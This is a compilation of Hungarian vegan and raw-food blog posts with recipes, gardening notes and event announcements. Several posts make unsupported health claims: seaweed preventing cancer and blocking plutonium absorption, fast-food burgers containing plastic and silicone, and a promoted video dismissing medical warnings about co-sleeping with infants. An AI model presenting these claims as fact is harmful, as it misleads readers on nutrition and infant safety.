Most megint egy kicsit elkalandozok az ételkészítéstől, és egy kerékpáros programra szeretném felhívni olvasóim figyelmét: 2011. május 28-án, szombaton kerül megrendezésre a 5. MÓRI KARIKA elnevezésű jótékonysági, kerékpáros túra. Honlapja: morikarika.hu Sajnos óvodai elfoglaltság miatt nem tudok részt venni rajta, de kívánok sok sikert az indulóknak! Egy ilyen túra előtt át kell gondolni, hogy mit visz magával az ember éhségének és szomjúságának csillapítására. Én azt vettem észre magamon, hogy a nyári hőségben kapálás, vagy éppen túrázás közben nekem a gyümölcslé a legjobb. A tavasz nagy felfedezése volt számomra a spárgám: évekkel ezelőtt elszórtam magot, aztán el is feledkeztem róla, és idén, amikor rendbe tettük a kert végét, nem akartam hinni a szememnek! Kitáblázom, hogy megmaradjon jövőre is, nehogy véletlen bekapáljuk! Az utóbbi időben rengetek karalábét ettünk, mert éppen az termet a kertben. Párom már mesteri fokra fejlesztette a karalábé saláta receptjét, amihez egy dolgot érdemes tudni: a dobozt fedjük le időben :-) (ilyenkor mindig felismerem, hogy tulajdonképpen nekem akar udvarolni ) Persze készült belőle leves, és fasírt is, ami szintén nagy sikert aratott. Ültettem medvehagymát, jövőre meglátjuk, hogy mi lesz belőle. És persze az eper! Tegnap nagy élvezettel gyomláltam a sárgarépát, mert rögtön mellette ott piroslottak az eperszemek - itt a múlt idő használata helyes, mert meg kellett kóstolnom, hogy elég édes-e :-)
Kukoricás-tejszínes farfalle
2011. május 8. Vera vega konyhája
Pénteken eltelt a délelőttöm vendégeskedéssel, és mikor az ovisok hazaértek, még nemhogy nem volt kész az ebéd, ötletem sem volt, mit készítsek... Gyorsan körbenéztem a kamrában-hűtőben, és ezt a tésztaételt alkottam. Mivel azonban később ettünk, mint a szokásos, úgy éreztem, kell egy kis kárpótlás, ezért a kertben terítettünk pokrócra, és piknikeztünk a szép napsütésben :) Hozzávalók: 1 közepes fej vöröshagyma 30-40 dkg morzsolt kukorica (én fagyasztottal készítettem) 4 dl növényi tejszín 10 dkg reszelt növényi sajt (Cheesly) szerecsendió, oregano 1/2 kg durum farfalle tészta A hagymát félbe, majd karikákra vágtam és olajon megdinszteltem. Rádobtam a kukoricát, átpirítottam, majd puhára pároltam. Hozzáöntöttem a tejszínt, reszeltem rá szerecsendiót, megszórta a reszelt sajttal és oregánóval, sóztam és összeforraltam. Ezzel a szósszal öntöttem le a kifőzött tésztát.
Ohagi, édes rizsgolyók
2011. május 3. Csatni és Umeboshi: Jógakonyha
A makrobiotikus étrend sem nélkülözi az édes ízeket, az édességet, csupán az alapnyagokat kell jól megválogatni hozzá. Az ohagi, egy hagyományos japán recept aprószemű főtt édes rizsből készítik - ez alkalmanként a makrobiotikában is megengedett -, kicsi golyókat formáznak belőle, majd diófélékkel, apróra tördelt magokkal, vagy adzukiba-krémmel vonják be. Most kókuszreszelél illetve pirított szezémmag lett a bundája. Fanatikusabbaknak barna rizsből is készíthető. Hozzávalók: 2 bögre aprószemű édes fehér rizs, csipetnyi só, 1-2 evőkanál rizsszirup. Főzzük puhára a rizst. Mozsárral zúzzuk szét, hogy krémes állagú legyen. Ízesítsük rizssziruppal. Formázzunk belőle diónyi méretű golyókat, majd hempergessük meg ízlés szerint szezámmagban, vagy kókuszreszelékben.
Hamis tonhal saláta (tonhalkrém)
2011. április 10. A vegán szépség
Csicseriborsó: Ennek a borsófélének ?shazája feltételezhet?en El?-Ázsiában volt, de már régóta elterjedt élelem a földközi-tengeri országokban. Dél-Amerikában, Indiában és Pakisztánban is vetik. F?leg azokon a területeken nagyon népszer?, ahol alig tudják megfizetni a húst, hiszen rendkívül magas a fehérjetartalma. 100 g csicseriborsó energiatartalma: 1276 kJ (305 kcal), tápanyagtartalma: 20 g fehérje, 3,4 g zsír, 48,6 g szénhidrát, 9,5 g rost, 27 mg nátrium, 580 mg kálium, 110 mg kalcium, 428 mg foszfor, 108 mg magnézium, 6,5 mg vas, 30 mikrogramm A-vitamin, 0,5 mg B1-vitamin, 0,15 mg B2-vitamin, 1,5 mg niacin, 0,54 mg B6-vitamin, 4 mg C-vitamin. A csicseriborsót ki is lehet csíráztatni. Megtörténik a csoda, hiszen ebb?l a k?kemény magból néhány nap múlva ropogós, enyhén édeskés íz? csíranövény lesz. 100 g csicseriborsóból kb. 200 g csíranövény lesz. A csíráztatáshoz napi kétszeri öntözés, szobah?mérséklet és kb. 3 nap kell, míg a csíra 3 mm-nyire meg nem n?, ezután azonnal fel kell használni, mert megkeseredhet. A csicseriborsót a jobb emészthet?ség miatt 5 percig blansírozni (=forró vízben rövid ideig f?zni), illetve olajon párolni kell. Tengeri alga: Az ókori görög mitológia szerint a szépség és a szerelem istennője, Aphrodité, egyedülálló szépségét, csillogó haját és ragyogóan selymes bőrét a tengervíznek és a benne rejlő kincseknek, a tengeri sónak, az iszapnak és az algának köszönhette. Azokon a helyeken, ahol rendszeres algafogyasztók élnek, az emberek kitűnő egészségnek örvendenek, és közülük kerülnek ki a hosszú élet rekorderei is. Ma az algákat a világ legnagyobb élelmiszer-tartalékaként tartják számon.Rendkívüli hatékonyságukat a tengervíz és az emberi vérplazma hasonló összetétele és ásványianyag-koncentrációja magyarázza, mivel a vérben oldott ásványi anyagok összetétele és aránya nagyon hasonló a tengervízben megtalálható anyagokéval. Valamennyi alga kedvező tulajdonsággal rendelkezik. oA több ezer cianobaktérium-algafaj közül kiemelkedő szerepet kapott a Föld legősibb élőlényei közé tartozó Spirulina Platensis. Fejlettségi szintjét tekintve közelebb áll a baktériumokhoz, mint a többi algához. oAz Achophyllum nodosum, vagyis a barnamoszat nagy szerepet kap az egészség megőrzésében, a betegségek megelőzésében és a gyógyulási folyamatok gyorsításában. oA Carrageen Chondrus Crispus, vagyis a vörösmoszat főleg magas vitamin- és nyomelem-koncentrációja, illetve rosttartalma miatt harmonizálja az anyagcsere-folyamatokat, serkenti a pajzsmirigyműködést, és fokozza az ellenállóképességet. Asztmatikus, reumatikus, gyomorbél-rendszeri problémákban és a fogyókúrában is igen sokat segít. A tengeri moszatok ma újra fontos táplálékká váltak. Magas fehérjetartalmuk miatt a Föld leggazdagabb fehérjeforrásának tartják őket. Megtalálható bennük valamennyi aminosav, és felhasználásuk is változatos: teheted őket salátákba, levesekbe, zöldség- és gyümölcslevekbe is. oMagas a jódtartalmuk - a jód a tiroxinhormon alkotórésze, amit a pajzsmirigy termel. Ez a hormon biztosítja a fiatalos külsőt, szabályozza az anyagcserét.oMagas az A-, B-, C-, D-, E- és K-vitamin tartalmuk. A B12-vitamin ritka a növényi élelmiszerekben, az algából viszont ezt is megkaphatod. A sokféle vitaminnak köszönhetően jó a sejteket vitalizáló és immunerősítő hatása is. oBéta-karotin-, klorofill- és szeléntartalmuk miatt szabadgyökfogóként fontos szerepet töltenek be az érelmeszesedés késleltetésében, a szervezet ellenállóképességének megerősödésében és a rák megelőzésében. oOlyan szénhidrátot tartalmaznak, amely védi a szervezetet a nehézfémtartalmú mérgek - stroncium, kadmium, plutónium, bárium - felszívódásától. oA spirulina bázikus hatású, a savtúltengéses gyomorbetegségek esetében is ajánlott, gyorsan érezhető a hatása. Csökkenti a szervezet savasságát, így hatékony gyógyítószer a méregtelenítésben. oAz algának enyhe vízhajtó hatása is van, és mivel magas a rosttartalma, javítja az emésztést is. oKimagasló az ásványianyag-tartalmuk: sok vas, foszfor, kálium, kalcium, magnézium, cink van bennük. Bórtartalmuk közvetve szerepet játszik a kalcium- és a magnézium-anyagcsere szabályozásában. oA bennük lévő zsírsavak csökkentik a vér zsírszintjét, mérséklik a vérlemezkék összecsapzódását, kismértékben növelik a védő koleszterint - HDL -, és értágító hatásúak. Lassítják az érelmeszesedést, és csökkentik a vérnyomást. oMivel táplálók, az algák a fogyókúra, a salaktalanítás idején táplálék-kiegészítőként alkalmazhatók. Ha fél órával az étkezés előtt algát eszel, fehérjetartalmának következtében az agy éhségközpontjába jelek érkeznek, így jóllakottságérzet kerít hatalmába. (forrás: Ideál magazin, elelmezes.hu) Jó étvágyat! :)
SALÁTÁK ÉDESEN ÉS KESERŰN
Megkezdődött a böjti időszak, a héten próbáltam ráhangolódni testi -lelki megújulásra. Tegnap este még történt egy kis kilengés baráti körben, de ez nem okoz nehézséget a böjti startban. Már említettem, hogy idén igazán a magam személyére szabott módon fogok böjtölni. Egy- két héten keresztül csak zöldséget és gyümölcsöt fogok fogyasztani magvak, olajok nélkül, a gabonákat is elfelejtem egy időre. A nyersesség lesz a cél, de ha valamit enyhén párolva kívánnék majd inkább, akkor abból nem csinálok majd gondot. Ezután majd csak sűrű, majd híg leveket szeretnék fogyasztani, aztán vissza a szilárd zöldség gyümölcsre. De igazából az ösztöneimre bízom most magam, ahogyan jönnek majd a dolgok. Igazából most nem érzem annyira égetőnek a böjtöt, ezért nem tervezek szigorú vízkúrát, majd meglátom, hogyan alakul. Hogyan állok lelkileg, mire van kapacitásom és kedvem. A ráhangolódás jegyében készült ez a két saláta a héten, az egyiket a TV Paprika márciusi száma ihlette, csak én nyersre fordítottam a magazinban szereplő cékla salátát. Egyébként a jelenlegi számban olvasható egy cikk a nyers étkezésről -elég felszínes-, és néhány recept is. Narancsos cékla saláta: 2 adaghoz 2-3 cékla mérettől függően 1 narancs héja 1/2 naracs leve fenyőmag Himalája só mandarinos extraszűz olívaolaj Ez egy édeskés ízvilágú saláta, nagyon finom. Emellé készítettem egy kesernyés, savanykás salit is: 1 db retek 1 db kaliforniai paprika néhány levél radicchio citromlé reszelt citromhéj friss gyömbér tökmagolaj Himalája só Én nagyon szeretem a keserű ízt (ld kávémánia), és ezt a radicchio-t most Olaszországból hurcoltam hazáig az illatos naranccsal együtt.Az olajat pedig itt vettem.
Bajai-i program
Alábbiakban 1 meghívó a Magyar Közlekedési Klub hírleveléről: Környezet- és Természetvédő Szervezetek XXI. Országos Találkozója - 2011. március 17-20 A Magyar Közlekedési Klub szokásos közlekedési szekcióját a Levegő Munkacsoporttal közösen tartja a Duna-mente közlekedése témában. Baja és környéke közlekedési problémáiról is szó lesz, konkrét panaszaikat, felvetéseiket előzetesen is várjuk a somodi@levego.hu e-mail címen. Helyszín: Baja, Eötvös József Főiskola Bajcsy-Zsilinszky u. 14. Rendezők: Baja Ifjúsági Természetvédelmi Egyesület Magyar Madártani és Természetvédelmi Egyesülettel Duna Környezetvédelmi Fórummal
édeskömény télen-nyáron
azt a rész most ugorjuk át, miért is szünetelek. hosszú.. (például pont azért, mert már túl hosszú lenne az összes dolgot leírni, amit szeretnék :) inkább jöjjön végre egy recept: tél van, és alig találok valamit, amit meg tudnék enni. a gyökérzöldségek valahogy nem esnek jól, de a paradicsom, az uborka és tárasaik is régóta hiányoznak a hűtőmből. a biotermelők egén sem süt többet a nap ilyenkor, és talán nemcsak az íztelen termények, de a természeteshez egyre közelítő életmódom is azt diktálják, hogy ne vegyek primőr zöldséget. az édeskömény viszont maradt, ezt bármikor meg tudnám enni. a másik jockernövényem a cukkini, igaz ezzel vannak azért fenntartásaim ilyenkor, de a banánnal, naranccsal is vannak.. és hát valamit mégiscsak kell enni: azt, ami jól esik. nyár óta tervezem az édesköményes receptem megosztását, fotók készültek is, de a posztig nem jutottam el. pedig igazán egyszerű: az édesköményt félbe majd hajszálvékony szeletekre vágom (a torzsáját kivéve). így elvágom a rostokat - amiket különben macerás lenne rágni - mégis dekoraív szeleteket kapok. a zöldjét lazán aprítva keverem hozzá. erre jön az öntet, szezonális gyümölcs. nyáron barackot tettem hozzá, turmixolva vagy kockázva, ősszel és amíg még volt finom, körtét. most már az sem az igazi, de az aszalt gyümölcsöket áztatva, turmixolva nagyon szeretem ilyenkor. sűrűn lekvárnak, hígabban pudingnak akár fűszerekkel, vagy a friss gyümölcsturmix téli változataiként.. és öntetként például édesköményre! :) a nagy kedvenc pedig a füge, szinte bármikor bármennyi jöhet, az édesköményt is azzal készítem mostanában.
Ünnepi édes óriásperec
2010. december 19. KryaSpirit-Vegalife
A karácsony nem múlhat el anélkül, hogy ne sütnénk valamilyen keltet. Talán csak a fenyő illata jobb annál, mint amikor az édes, a vaníliás, a diós ,,ízek lengik körül a lakást. Ebben a tésztában nincs dió, de mindenki azt fogja hinni, hogy van. A barna nádcukor jellegzetes íze, a vaj selymessége adja azt a felejthetetlen ízt, amit ennek a perecnek az elfogyasztásakor érzünk. Ez a recept A Kifőztük Magazin Karácsonyi különszámában is megjelent! És akkor most itt ragadom meg az alkalmat, hogy szóljak nektek, hogy aki még szeretne adakozni, vagy a felajánlott összeget még nem utalta át, az nagyon siessen, mert már csak 1 nap áll rendelkezésére, hogy ezt megtegye. Én mindenkit bíztatok, hogy ha csak csekély összeggel is, de járuljon hozzá a szegénységben élő gyerekek megsegítéséhez!!!! Hozzávalók: 2,5 dkg friss élesztő 2 dl hideg növényi tej 2 evőkanál barna nádcukor 15 dkg puha vaj/biomargarin 35 dkg tönkölybúza fehérliszt Töltelék: 15 dkg vaj/biomargarin 12 dkg barna nádcukor 2 teáskanál Bourbon vaníliapor Az élesztőt egy tálba morzsoljuk, hozzáadjuk a tejet és addig kevergetjük, amíg teljesen fel nem oldódik. Hozzáadjuk a cukrot, a vajat/margarint és a lisztet és robotgépben rugalmas tésztát dagasztunk. A liszt minőségétől függően kellhet még hozzá 1-2 evőkanál liszt. A töltelékhez a vajat/margarint, a cukrot és a vaníliaport elkeverjük egymással. A tésztát két egyforma részre osztjuk és mindegyiket külön-külön formázzuk. Először egy 15x70 cm-es téglalapot nyújtunk belőle és megkenjük a töltelék felével, majd két oldalról a hosszanti oldalán feltekerjük úgy, hogy középen egy fél cm-es rés maradjon. A két végét behajtjuk és perecet formázunk belőle, majd sütőpapírral bélelt sütőlemezre tesszük, egymástól a lehető legnagyobb távolságban, mert még jócskán nőni fog a tésztánk. Konyharuhával letakarjuk és legalább 2 órán keresztül a konyhapulton kelesztjük. A sütőt előmelegítjük 225 (hőlégkeverésen 200) fokra és a megkelt tésztát a sütő legalsó rácsán 10-15 perc alatt aranybarnára sütjük. Picit hagyjuk hűlni a tepsiben, majd sütőrácson fejezzük be a műveletet.
Lencse"burger" thai mogyorószószos salátával
2010. november 7. CsemetEledel
Íme egy nagyon egyszerű, tápláló, és könnyű vacsorarecept. A saláta pedig nagy valószínűséggel lesz a gyermekek kedvence, hiszen édes, mézes, kókuszos szósszal készült. A burgert sajnos, amúgy is szeretik. Ha viszont ezt a lencseburgert adjuk neki, biztosak lehetünk abban, hogy nem lesz benne műanyag, halott mindenféle állati maradvány, és durva szilikonszármazék(mint a mekisekben) . Ezzel szemben tele van esszenciális aminosavakkal, magas tápértékű fehérjével, és vitaminokkal. Nem hízlal, nem egészségtelen, és nem is olajban sült. És miért ne rághatna egy egyéves fejessalátát? a burgerhez: -1 bögre vöröslencse -1 kaliforniai paprika -1fej vöröshagyma -1-2 gerezd fokhagyma -só, bors, vegamix, babérlevél -4-6 koktélparadicsom -juharszirup, vagy méz -balzsam ecet, vagy alma ecet salátához: -1 kisebb fej fejessaláta, vagy iceberg(jég) saláta, esetleg nagyobbaknak rukkola, vagy keverve, ahogy én készítettem most. -6-7 koktélparadicsom a szószhoz: -egy marék kesu dió, meg egy marék földimogyoró (én még makadámia diót is raktam bele) -4 evőkanál kókusztej -3 evőkanál méz vagy juharszirup -(felnőtteknek chili paprika) -1/2 citrom, vagy lime leve A mogyorót és a kesu diót beáztatom 1-2 órára annyi vízbe, hogy bőven ellepje. A lencsét megmosom, és kevés sós vízben felteszem főni. A vörös lencse nagyon gyorsan puhul, így áztatás nélkül is kész lesz 1o-15 perc alatt. Babérlevéllel felteszem főni. Addig apróra kockázom a hagymát a paprikát és a paradicsomot, megpucolom a fokhagymát. A hagymát kevés olíván üvegesre párolom, majd ha kész beleteszem a préselt fokhagymát 1-2 percig pirítom. Rádobom a paprikát és kb 1o perc múlva a paradicsomot, sózzuk borsozzuk, vegamixet adunk hozzá(ízlés szerint). Ha ez kész és a lencsénk is megfőtt, lecsepegtetjük, és aprítógépben vagy mixerben 1 perc alatt lepürésítjük. A pürét a hagymás pörköltalapba forgatjuk, és kb 5 percig összesütjük. a juharszirupot és az ecetet a végén keverjük bele(ízlés szerint). Félretesszük hűlni. A salátát leveleire szedjük, összevágjuk, majd megmossuk, és ha van salátacentrifugánk(érdemes beruházni) megszabadítjuk a víztől, majd egy nagy, mély salátástálba helyezzük. A koktélparadicsomokat négyfelé vágjuk, és hozzáadjuk a salátához. A mogyoróról dióról leöntjük a vizet és az aprítóba helyezzük őket. Hozzáadjuk a kókusztejet, a citomlevet, mézet, kevés sót(chilit, nem gyerekes verziónál). 1 perc alatt összeturmixoljuk , hogy egy apró mogyoródarabos mártogatós szósz állagú dip-et kapjunk. Ezt a szószt ráöntjük a salátakeverékre, és jó alaposan összekeverjük, hogy a szósz mindenhová jusson. Közben a langyosra hűlt, és a lencse keményítőtartalmának köszönhetően összeállt masszából pogácsákat formálunk és teljes kiőrlésű zsemle, vagy magvaspirítós közé helyezzük, salátával tálaljuk. Jó étvágyat! :) tipp : ha gyermekünk allergiás a mogyorófélékre, akkor az természetesen hagyjuk ki.
Mandulatej
2010. november 4. CsemetEledel
Most, hogy baratkozom a vegan es kulonosen a nyersetel receptekkel, egyre tobb fantasztikus es egyszeru etelt italt ismerhettem meg. Egy egeszen uj, izgalmas, es a leheto legegeszsegesebb etkezes szamomra a nyersetelek vilaga, es eleg jol boldogulok vele, ma mar etkezesem 70%-at nyers zoldsegek, gyumolcsok, es magvak teszik ki.. A kizarolag nyerskoszton elok kozott a leggyakrabban fogyasztott novenyi tejfajta a mandulatej. Marcsak azert is, mert nem igenyel semmifele fozest, sutest, ami alatt a hozzavalok modosulnanak, vagy azok vitamintartalma teljesen elvesz. Mandulatej. Mar magatol a szotol is ossszefutott a nyal a szamban, es mivel a rizstej eloallitasa eleg hosszadalmas es maceras(meg fozni kell), mindenkeppen ki akartam probalni. Az eredmeny korulbelul masfel liter kellemesen edes mandulaaromaju habzo tej lett. Mostanra a mindennapi etkezesunk elengedhetetlen resztvevoje. Ime a recept. Kell hozza: -egy bogre sozatlan nyers mandula -egy marek kimagozott aszalt datolya - tisztitott- vagy szensavmentes asvany viz -turmixgep -egy szurozsak, vagy egy nagyon suru lyuku szita vagy szuro. egy nagy talba vagy egy kancsoba beleteszem a mandulat, majd felontom 7-8 bogre tisztitott vizzel. egy napig hagyom, hogy a mandula es a datolya jol megszivja magat vizzel. masnap leontom rola a vizet es beleteszem egy turmixgepbe, hozzaadom a szaritott datolyat, majd raontok kb6- 7 bogre vizet(ki hogy szereti. a mundulasabb izet kedvelok kevesebbet hasznaljanak :). kb 3 percig a legerosebb fokozaton osszeturmixolom. az igy kapott folyadekot egy szurozsakba ontom, es alaposan kicsavarom, hogy csak a visszamaradt mandula maradjon benne. en egy sima femszuron passziroztam at egyebkent. a megmaradt szarazanyag tokeletes mandulas sutemenybe liszt helyett. Ha valakinek nem eleg edes a tej, akkor utolag is rakhat bele pl agave szirupot, vagy barmilyen termeszetes edesitot(nem cukrot). Jo etvagyat! :) Hutoben 1-2 napig elall, de nalunk nem jutott el a kancso odaig :)) Tipp: akinek van otthon, vaniliarudat is tehet bele, ugy meg finomabb. ha a leiras nem eleg vilagos, itt talalhattok szemlelteto videot, egy aztatas nelkuli mandulatej kesziteserol. Pofonegyszeru es gyors.
Megölhetjük a gyermekünket az együtt alvással?
2010. október 28. CsemetEledel
Előre is elnézést kérek, hogy a videó, angolul van, de remélhetőleg sok olvasó tud angolul,(nagyon érthető egyébként). Amint lesz egy kis időm, lefordítom, Ka Sundance, nyersétel-vegán aktivista videóját, aki egyébként 4 gyermek édesapja és 9 éve alszik együtt gyermekeivel. Felháborodottságában rögzítette ezt a videót, miután egy nagyon híres amerikai oldal, aki nők millióinak segít naponta, közzétette , hogy veszélyes a gyermekkel vagy babával együtt aludni, mert az anya megölheti. Muszáj megnéznetek, főleg azoknak akiknek még van kétsége arról, hogy az együtt alvás káros e a gyermekeinkre, vagy a rossz nevelés alapja. Többek között összehasonlítja milyen a gyermeknek egyedül egy mozdulatlan sötét szobában feküdni, vagy a szülők, ölelő szerető karjában. Vagy, hogy a doktor, akinek nincs gyereke, mondja meg, hogy mi a jó a gyermeknek, vagy mi nem. Mit kell tennie az anyának, annak ellenére, hogy az anyai ösztön mondjuk mást súgna. Fantasztikus videó, remélem minél többen megnézik. :)
Agyfenyezo golyocskak
2010. október 19. CsemetEledel
a diot senkinek nem kell bemutatnom. vagyis remelem sokan tudjak, hogy ebben az egyszeru magban micsoda csoda rejlik. ez az edesseg szupergyors, szuperegeszseges es szuperfinom. kell hozza ket marek dio, azt megorolom. beleteszek egy nagy evokanal repcemezet(azert ezt, mert ez nem folyos, hanem zsirszeruen kremes. majd egy tk. fahejat, es megszorom meg egy kis szerecsendioval is. az egeszet jol osszedolgozom, kicsi golyokat formalok belole, es jol megesszuk:)) jo etvagyat! tipp: a kozepere tehetunk mazsolat vagy barmilyen szaritott vagy kandirozott gyumolcsot.
nem minden nap habos torta.. vagy mégis?
nem, csalok. hiába egészségesebbek ezek a desszertek, nem árt mértéket tartani. sok zsiradékot tartalmaznak, ami nemcsak az alakunknak, de az egészségünknek is árt, ráadásul a magok és édes gyümölcsök (pláne friss gyümölcsök) együtt az emésztőrendszert is megdolgoztatják. itt azért uralkodtak el mostanság a desszertek, mert - nagy örömömre - egyre többször jönnek megrendelések. most egy családi vendégségre készültem ezekkel a tortákkal és kakaóbabos trüffelekkel. a legutóbbi körtetortán elég sokat változtattam, egyrészt most mandulás-datolyás kosarakba került, másrészt a krémből kihagytam a gyömbért. ezen kívül nagyon figyeltem, hogy a körték elég érettek és puhák legyenek, mert a krém csak akkor lesz homogén, és elég édes. a kosárkák közepébe rejtett körtedarabkáknak is szinte olyan puhának kell lenni, mint a krém! és kivételesen nem felejtettem el mérni.. alap 9 kosárkához: 1 csésze (2 dl) áztatott, hámozott majd teljesen kiszárított mandula 1 csésze magozott, darabolt datolya pici só (elhagyható) krém: 1 csésze kesudió 2 csésze érett, hámozott, felkockázott körte 2-3 ek kókuszolaj (ettől hűtőben megszilárdul a krém, de el is hagyható) (a citromlét kifelejtettem, pedig terveztem bele.. de utólag nem hiányzott) + kb 1 csésze körte a kosárkák belsejébe mivel a mixerem megint feladta a harcot, turmixgépben csináltam mindent. csodák csodája, remekül működött! először a mandulát daráltam finomra pulzáló módban, majd hozzáadtam a datolyát is, és addig aprítottam - az edény faláról időnként lekanalazva a cuccot - amíg gyúrható, de még könnyen szátmálló állagot értem el. a krém hozzávalóit egyszerűen összeturmixoltam, teljesen homogénre. ez az adag kicsit több mint ami a kosárkákba fér, pont elég lett volna, ha a közepükből kihagyom a körtedarabokat. de nem érdemes kihagyni, mert jó kontrasztja a gazdag krémnek, és kicsit könnyebbé is teszi a desszertet. (a maradék krémet betettem a fagyasztóba 2 kis muffinformában) * megjegyzés: csak a vacsorán teszteltem, de elégedett voltam az eredménnyel (és a vendégek is): a 2:1 gyümölcs:kesu arány + extra gyümölcs pont elég könnyű lett, mégis krémes és visszafogottan édes, amihez jól passzolt az édesebb alap.
kerti parti nyers desszertekkel
jó ideje erre készülődetem: nagy kerti parti volt tegnap, ahová nyers desszerteket vittem. sokan voltunk, a hagyományos menüt és a kiszolgálást egy rendezvény szervíz biztosította, a nyers édességek csak érdekességképpen kerültek az asztalra. vártam, hogy a hagyományos ízekhez szokott vendégek hogy fogadják majd ezeket a desszerteket, és nagy öröm volt, hogy sikert arattak :) körtés gyömbéres kosárkák, ebből vittem Norkához pénteken, ahol vele, Gittával, Annával és Craig Sommerssel töltöttünk egy csodálatos délutánt. Craig egy előadást tartott nálunk, ezért utazott ide - Gitta blogján bővebben olvashattok róla. örülök hogy megismerhettem, és hogy volt alkalmam egy jót beszélgetni vele és a lányokkal. a képen még e80 kockák és mogyorós trüffel barackpudingos kosárkák narancsvirágos hógolyók készültek még kakaóba forgatott kókuszgolyók is, de ezeket a nagy sürgés-forgásban nem sikerült lefotózni nem tűnik hatalmas adagnak, de 3 napot dolgoztam és épphogy elkészültem az utolsó pillanatra. és hiába kísérleteztem, terveztem hetek óta, végül mégis rögtönöztem a recepteket, ráadásul meglehetős felfordulásban és összevisszaságban, tehát méregetésről szó sem lehetett. pedig terveztem, hogy ezt most szépen kimérem, és fotózok is közben, de ez megint nem jött össze. meglepő, hogy ezek után a végeredménnyel szinte tökéletesen elégedett voltam (ez persze nem jelenti azt, hogy mostantól ugyanígy csinálok midnent :) jobb, ha a körülbelüli recepteket leírom, aztán vagy lesz időm pontosítani, vagy nem.. barckos kosárka: alap : kesudió és datolya kb 2:1 arányban barack puding : barackok és utifű maghéj körtés gyömbéres kosárka: alap : törökmogyoró, mazsola, kakaópor krém : kesudió és körte kb 2:3 arányban, gyömbér, méz és kevés utifű maghéj (a kókuszolaj kivételesen jobb lett volna, de ha számítani kell rá, hogy órákat áll majd a süti szobahőmérsélkleten, azt el lehet felejteni) körtedarabok E80RV kockák: alap : hajdinacsíraliszt, mogyoró és datolya kb 1:1:1 arányban csokikrém : datolyapaszta, kókuszolaj, mogyoró, kakaó marcipán : mandula, mandulaliszt, méz kávékrém : kesudió, eszpresszó, méz, víz és agar-agar (itt egy kicsit csaltam: sem a kávé, sem az agar-agar nem nyers, de mivel a mennyiségük nem számottevő, és egyémbént sem olyasmiről van szó, amit az ember naponta fogyaszt, ennyi azért beleférhet) a tetejére kakaópor mogyorós trüffel: datolyakrém, kakaó és törökmogyoró, belül egy szem mogyoróval, aprított mogyoróba fogatva narancsvirágos hógolyó: ugyanaz, mint a rózsavizes, csak narancsvirágvízzel. kókuszgolyó: kókuszkrém és méz, kívül kakaópor
Mákos-mézes zsömlék
2010. augusztus 17. CsemetEledel
Ma két dologra jöttem rá. Az egyik, hogy a mák szeretete öröklődik, a másik, hogy egy olyan országban élek, ahol nincsen kifli. Nagyon gyorsan kellett desszertet készítenem . A szerencsém az volt, hogy zsömléből is meg lehet csinálni a gubát, és még hazai darált mák is volt otthon. A kisfiam az adag felét pusztította el. Egyébként amelyik gyermek nem szereti a mákot és nem allergiás az olajos magvakra, dióval is el lehet készíteni. Szupergyors, szuperfinom. kell hozzá: - 3 szikkadt zsemle -25 deka mák -1 evőkanál méz -2-3 dl növényi tej (nálam ez a vaníliás szójatej volt, de minden növényi tej alapból édes) A zsemléket felkockázzuk, és egy mély tálba tesszük a felét, lehetőleg egymás mellé. A tejet a mézzel felmelegítjük, míg a méz el nem olvad benne. De ügyeljünk, hogy ne legyen túl forró, hiszen a méz elveszíti az összes tápanyag és vitamintartalmát. A tej felével meglocsoljuk a zsemléket, majd megszórjuk a mák felével. Rárakjuk a maradék zsömlét, meglocsoljuk a tejjel, és végül a mákot is rászórjuk. Öt perc elteltével az egészet alaposan összekeverjük. Tányérra kiszedve porrá őrölt xilit-tel tálaljuk. Jó étvágyat!
saláta, édeskömény és banán
most, hogy egyre több a hazai gyümölcs, nem nagyon eszem már banánt, tulajdonképpen csak ha fagyit csinálok. de most ahogy álltam az édeskömény felett, milyen gyümölcsöt is tennék hozzá szívesen.. ez akadt a kezembe, és nem volt rossz választás. egy kisebb édesköményhez hozzátépkedtem pár levél salátát, rászórtam a kömény zöldjét (jó sok volt) és csepegtettem rá egy kevés citromot. rákarikáztam 2 banánt - ennyihez mehetett volna nyugodtan több édeskömény és saláta is, de kevésbé zöldpártiaknak pont jó arány. közben eszembe jutott, hogy keleti tanok szerint egy étkezés alatt minden alap íznek (édes, savanyú, sós, keserű) szerepelnie kell. véletlen egybeesés lenne, hogy ha az ember gyümölcsöt salátával eszik, ez is megvalósul (gyümölcsök: édes-savanyú, levelek: sós*-keserű)? * a leveleket, zöldségeket egy idő után az ember önmagában sósnak érzi - a sóval is az ásványi agyagokat próbáljuk pótolni, ami a zöldfélékben tökéletes összetételben adott.
"Jó regglet" kása
2010. június 21. Legyen néktek eledelül...
Meglepően letisztul, de finom recepte. Pár alapanyagból, hihetetlen micsoda ízkavalkádot lehet varázsolni. Frissítő citromos laktató reggeli. Valószínű ma sem 20 perc alatt készül el a reggelink, ha nincs a pelyhesítő, amivel "kezeltem" a rizst főzés előtt, hisz a barnarizs nagyon nagyon lassan főne meg egyébként.. Datolyából kétszerannyit ratkam mint amennyit a recept ír, de így sem mondanám túl édesenke. (evésnél csempésztünk bele a tegnap este készült kókuszos granolából is egy picit) Bionarancsot nem kaptunk sajnos, így citromhéjj került belel jobbhíjján, de így is tökéletes reggelit biztosított. Hosszú idő óta főtt megint ilyen igazi reggeli itthon, de ezt aki követi a blogot sejtheti. Elég nagy pocakom van már, és olyan könnyen elcsábulok a lustálkodás irányába, pedig augusztus végéig még sok idő van. Ma megtört a jég, és újra finom falatok, és amennyire tőlem telik szép fotók készülnek a konyhámban, és nem utolsó sorban, élményteli posztok a blogba. Köszönöm ha kivártátok hogy visszatérjek, remélem többet nem fogok így eltünni igazolatlanul.:)
Mézes-citromos túróval töltött kakaós palacsinta...meg még eperszósz is
